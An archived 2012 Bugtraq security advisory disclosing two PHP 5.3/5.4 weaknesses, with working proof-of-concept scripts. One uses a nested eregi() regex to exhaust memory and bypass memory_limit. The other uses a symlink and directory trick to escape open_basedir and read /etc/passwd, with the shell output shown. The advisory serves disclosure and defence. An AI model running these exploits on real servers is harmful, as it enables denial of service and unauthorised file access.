[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: PHP 5.4/5.3 deprecated eregi() memory_limit bypass
From: cxib () cxsecurity ! com
Date: 2012-03-30 13:05:55
Message-ID: 201203301305.q2UD5tFn027886 () sf01web2 ! securityfocus ! com
[Download RAW message or body]
[ PHP 5.4/5.3 deprecated eregi() memory_limit bypass ]
Author: Maksymilian Arciemowicz
Website: http://cxsecurity.com/
Date: 30.03.2012
Original link:
http://cxsecurity.com/issue/WLB-2012030272
PoC's:
memory_limit poc
http://cxsecurity.com/issue/WLB-2012030271
open_basedir poc
http://cxsecurity.com/issue/WLB-2012030270
--- 1. PHP memory_limit bypass ---
Functions based on POSIX Regular Expression eg. eregi, are deprecated since PHP 5.3. \
In last version 5.4.0 we may still use these functions. It allow us to bypass \
memory_limit in PHP.
eregi() function based on POSIX regexp, otherwise preg_match() based on PCRE. This is \
the main difference between these functions.
POSIX Regex Functions Tutrial
http://lu.php.net/manual/en/ref.regex.php
PCRE Functions Tutrial
http://lu.php.net/manual/en/ref.pcre.php
In last year, we have published a fix for regcomp()/libc function from NetBSD source. \
eregi() use the same source code what in libc of netbsd. In result, we may exhaustion \
memory limit or stack in PHP
See our security note:
Multiple BSD libc/regcomp(3) Multiple Vulnerabilities
http://cxsecurity.com/research/102
Script presented below, show how to use eregi() to exhaustion memory in PHP
- http://cxsecurity.com/issue/WLB-2012030271 --
<?
/*
PHP 5.4 5.3 memory_limit bypass exploit poc
by Maksymilian Arciemowicz http://cxsecurity.com/
cxib [ a.T] cxsecurity [ d0t] com
To show memory_limit in PHP
# php /www/memlimpoc.php 1 35000000
PHP Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate \
35000001 bytes) in /var/www/memlimpoc.php on line 12
Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate \
35000001 bytes) in /var/www/memlimpoc.php on line 12
and try this
# php /www/memlimpoc.php 2
memory_limit bypassed
*/
ini_set("memory_limit","32M");
if($argv[1]==1)
$sss=str_repeat("A",$argv[2]);
elseif($argv[1]==2)
eregi("(.?)(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((( \
(((((((((((((((((((((((((((((((((((((((((((((((((.*){1,2}){1,2}){1,2}){1,2}){1,2}){1,2 \
}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}) \
{1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1 \
,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2 \
}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}) \
{1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1 \
,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2 \
}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}) \
{1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}","a");
?>
- http://cxsecurity.com/issue/WLB-2012030271 --
Remember. Don't use memory_limit as a main memory limiter.
--- 2. PHP open_basedir bypass ---
PHP latest version, 5.4.0 brought many changes. safe_mode has been removed but \
open_basedir is still available for use. We don't need look for new ways to bypass \
open_basedir. The problem with symlinks is still available in PHP.
safe_mode tutrial
http://php.net/manual/en/features.safe-mode.php
PoC:
127# cat sym.php
<?php
symlink("/etc/passwd", "./symlink");
?>
127# php sym.php
PHP Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not \
within the allowed path(s): (/www) in /www/test/sym.php on line 2
Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not \
within the allowed path(s): (/www) in
/www/test/sym.php on line 2
127#
open_basedir will disallow /etc/passwd.
Let`s see:
127# ls -la
total 8
drwxr-xr-x 2 www www 512 Oct 20 00:33 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
-rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
-rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
127# pwd
/www/test
127# cat kakao.php
<?php
mkdir("abc");
chdir("abc");
mkdir("etc");
chdir("etc");
mkdir("passwd");
chdir("..");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("abc/abc/abc/abc","tmplink");
symlink("tmplink/../../../etc/passwd", "exploit");
unlink("tmplink");
mkdir("tmplink");
?>
127# php kakao.php
127# ls -la
total 12
drwxr-xr-x 4 www www 512 Oct 20 00:37 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
drwxr-xr-x 4 www www 512 Oct 20 00:37 abc
lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd
-rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
-rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink
127# cat exploit
# passwd
#
root:*:0:0:god:/root:/bin/csh
..
now "tmplink" is a directory. so link "exploit" will be "../../etc/passwd". We don't \
need bypass open_basedir, it is a design mistake. PHP will allow \
"tmplink/../../../etc/passwd" because ./tmplink/../../../etc/passwd really exists.
PoC:
http://cxsecurity.com/issue/WLB-2012030270
Remember. Don't use open_basedir as a main security feature.
--- 3. References ---
Multiple BSD libc/regcomp(3) Multiple Vulnerabilities
http://cxsecurity.com/research/102
memory_limit bypass poc
http://cxsecurity.com/issue/WLB-2012030271
PHP 5.2.11/5.3.0 Multiple Vulnerabilities
http://cxsecurity.com/research/70
open_basedir bypass poc
http://cxsecurity.com/issue/WLB-2012030270
--- 4. Contact ---
Author: Maksymilian Arciemowicz
Email: max {AA\TT cxsecurity |D|0|T] com
http://cxsecurity.com/
http://cxsecurity.com/cvemap/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic